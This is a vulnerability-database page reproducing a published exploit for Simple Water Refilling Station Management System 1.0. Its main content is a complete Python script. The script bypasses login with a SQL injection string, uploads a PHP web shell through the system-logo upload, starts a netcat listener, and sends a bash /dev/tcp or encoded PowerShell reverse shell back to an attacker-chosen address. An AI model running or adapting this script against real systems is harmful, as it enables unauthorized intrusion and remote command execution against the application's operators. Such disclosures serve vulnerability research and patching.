Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Simple Water Refilling Station Management System 1.0 Shell Upload

🗓️ 16 Aug 2021 00:00:00Reported by Matt SorrellType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 276 Views

Simple Water Refilling Station Management System 1.0 RCE through File Uploa

Code
`# Exploit Title: Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload  
# Exploit Author: Matt Sorrell  
# Date: 2021-08-14  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14906/simple-water-refilling-station-management-system-php-free-source-code.html  
# Version: 1.0  
# Tested On: Windows Server 2019 and XAMPP 7.4.22  
  
# The Simple Water Refilling Station Management System   
# contains a file upload vulnerability that allows for remote   
# code execution against the target. This exploit requires   
# the user to be authenticated, but a SQL injection in the login form   
# allows the authentication controls to be bypassed. The application does not perform  
# any validation checks against the uploaded file at "/classes/SystemSettings.php"  
# and the directory it is placed in allows for execution of PHP code.  
  
  
#!/usr/bin/env python3  
  
import requests  
from bs4 import BeautifulSoup as bs  
import time  
import subprocess  
import base64  
import sys  
  
  
def login_with_injection(url, session):  
target = url + "/classes/Login.php?f=login"  
  
data = {  
"username": "test' OR 1=1-- -",  
"password": "test"  
}  
  
r = session.post(target, data=data)  
if '"status":"success"' in r.text:  
return True  
else:  
return False  
  
def upload_shell(url, session):  
target = url + "/classes/SystemSettings.php?f=update_settings"  
  
files = {'img': ('shell.php', "<?php system($_REQUEST['cmd']); ?>", 'application/x-php')}  
  
r = session.post(target, files=files)  
  
if r.headers['Content-Length'] != 1:  
print("[+] Shell uploaded.\n")  
return r.links  
else:  
print("Error uploading file. Exiting.")  
exit(-1)  
  
def activate_shell(url, session, OS, rev_ip, rev_port):  
target = url + "/admin/?page=system_info"  
  
r = session.get(target)  
page_data = r.text  
soup = bs(page_data, features='lxml')  
  
for link in soup.find_all('link'):  
if "shell" in link.get('href'):  
shell_url = link.get('href')  
break  
  
  
print(f"[+] Found URL for shell: {shell_url}\n")  
  
print("[*] Attempting to start reverse shell...")  
  
subprocess.Popen(["nc","-nvlp",f"{rev_port}"])  
time.sleep(1)  
  
if OS.lower() == "linux":  
cmd = f"bash -c 'bash -i >& /dev/tcp/{rev_ip}/{rev_port}'"  
else:  
cmd = f"$TCPClient = New-Object Net.Sockets.TCPClient('{rev_ip}', {rev_port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {{[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {{0}};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {{$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {{Invoke-Expression $Command 2>&1 | Out-String}} catch {{$_ | Out-String}}WriteToStream ($Output)}}$StreamWriter.Close()".strip()  
  
cmd = "C:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -enc " + base64.b64encode(cmd.encode('UTF-16LE')).decode()  
  
r = session.get(shell_url+"?cmd="+cmd)  
  
def main():  
  
if len(sys.argv) != 5:  
print(f"(+) Usage:\t python3 {sys.argv[0]} <TARGET IP> <LISTENING IP> <LISTENING PORT> <WINDOWS/LINUX Target>")  
print(f"(+) Usage:\t python3 {sys.argv[0]} 10.1.1.1 10.1.1.20 443 windows")  
exit(-1)  
else:  
ip = sys.argv[1]  
rev_ip = sys.argv[2]  
rev_port = sys.argv[3]  
OS = sys.argv[4]  
  
URL = f"http://{ip}/water_refilling"  
  
  
s = requests.Session()  
  
print("[*] Trying to bypass authentication through SQL injection...\n")  
  
if not login_with_injection(URL, s):  
print("[-] Failed to login. Exiting.")  
exit(-1)  
else:  
print("[+] Successfully logged in.\n")  
  
time.sleep(2)  
print("[*] Trying to upload shell through system logo functionality...\n")  
  
links = upload_shell(URL, s)  
  
# Sleeping for 2 seconds to avoid problems finding the file uploaded  
time.sleep(2)  
  
print("[*] Getting shell URL and sending reverse shell command...\n")  
activate_shell(URL, s, OS, rev_ip, rev_port)  
  
while True:  
pass  
  
  
if __name__ == "__main__":  
main()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Aug 2021 00:00Current
0.4Low risk
Vulners AI Score0.4
exploitremote code executionsql injectionvalidation checksshell uploadauthenticationbypassedvulnerabilitysystemsettingsfile uploadmanagement systemphpbase64reverse shellauthentication controls
276